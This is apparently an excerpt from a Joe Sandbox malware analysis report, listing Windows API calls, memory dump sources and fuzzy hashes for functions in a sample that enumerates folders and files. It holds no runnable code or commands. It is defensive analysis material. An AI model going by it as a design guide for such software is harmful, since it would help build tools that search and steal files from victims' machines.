                                                                                  • Opcode Fuzzy Hash: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                                                                                  • Instruction Fuzzy Hash: B801D6BAA4020877C714FBB0DC42EEE333CAB55304F00415DB68A570D1EE789AC88BA6
                                                                                  APIs
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                    • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
                                                                                    • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
                                                                                    • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
                                                                                    • Part of subcall function 00B1AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B1ABD9
                                                                                    • Part of subcall function 00B1AB87: lstrcat.KERNEL32(00000000), ref: 00B1ABE9
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                    • Part of subcall function 00B1AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B1AA4D
                                                                                    • Part of subcall function 00B0A077: memcmp.MSVCRT(?,00421264,00000003), ref: 00B0A094
                                                                                  • lstrlen.KERNEL32(00000000), ref: 00B0BF06
                                                                                    • Part of subcall function 00B19097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B190B9
                                                                                  • StrStrA.SHLWAPI(00000000,004213E0), ref: 00B0BF34
                                                                                  • lstrlen.KERNEL32(00000000), ref: 00B0C00C
                                                                                  • lstrlen.KERNEL32(00000000), ref: 00B0C020
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                                                                  • String ID:
                                                                                  • API String ID: 1440504306-0
                                                                                  • Opcode ID: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                                                                  • Instruction ID: 1821b76d693b4857f8bc28b16406689815708645c6002bc412998296db7b15e6
                                                                                  • Opcode Fuzzy Hash: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                                                                  • Instruction Fuzzy Hash: 2DB13271911208ABCB18FBA0DD96EEE77B9AF54300F904199F50662091EF347F88CF62
                                                                                  APIs
                                                                                  • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                                                                  • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                                                                  • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                                                                  • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$CloseFileNextlstrcat
                                                                                  • String ID: !=A
                                                                                  • API String ID: 3840410801-2919091325
                                                                                  • Opcode ID: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                                                                  • Instruction ID: 20ec2b31cb4d991c835852fde49fc2354676703d0d5a57c203257a76fc367b8d
                                                                                  • Opcode Fuzzy Hash: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                                                                  • Instruction Fuzzy Hash: FCD012756401096BCB20EF90DD589EA7779DB55305F0041C9B40EA6150EB399B818B95
                                                                                  APIs
                                                                                    • Part of subcall function 00B19047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B19072
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B151E1
                                                                                  • lstrcat.KERNEL32(?,00421070), ref: 00B151FE
                                                                                  • lstrcat.KERNEL32(?,0064A5F8), ref: 00B15212
                                                                                  • lstrcat.KERNEL32(?,00421074), ref: 00B15224
                                                                                    • Part of subcall function 00B14B77: wsprintfA.USER32 ref: 00B14B93
                                                                                    • Part of subcall function 00B14B77: FindFirstFileA.KERNEL32(?,?), ref: 00B14BAA
                                                                                    • Part of subcall function 00B14B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00B14BD8
                                                                                    • Part of subcall function 00B14B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00B14BEE
                                                                                    • Part of subcall function 00B14B77: FindNextFileA.KERNEL32(000000FF,?), ref: 00B14DE4
                                                                                    • Part of subcall function 00B14B77: FindClose.KERNEL32(000000FF), ref: 00B14DF9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 2667927680-0
                                                                                  • Opcode ID: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                                                                  • Instruction ID: 3770d4ac46aba918a8de271be71ff2acbe82327dde4405e81120106f7147f967
                                                                                  • Opcode Fuzzy Hash: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                                                                  • Instruction Fuzzy Hash: D921DDBAA402047BC714FBF0DC46EEA33BDAB55300F4045C87645931C1DE749AC9CB92
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpynlstrlenwsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 1206339513-0
                                                                                  • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                                                  • Instruction ID: d833bf04eb3ec8f2620056c7015c170b2818704088d0afe95670e358db5cdf62
                                                                                  • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                                                  • Instruction Fuzzy Hash: C101DA79540208FFCB14DFECD998EAE7BBAEF49394F108148F9099B301C635AA41DB95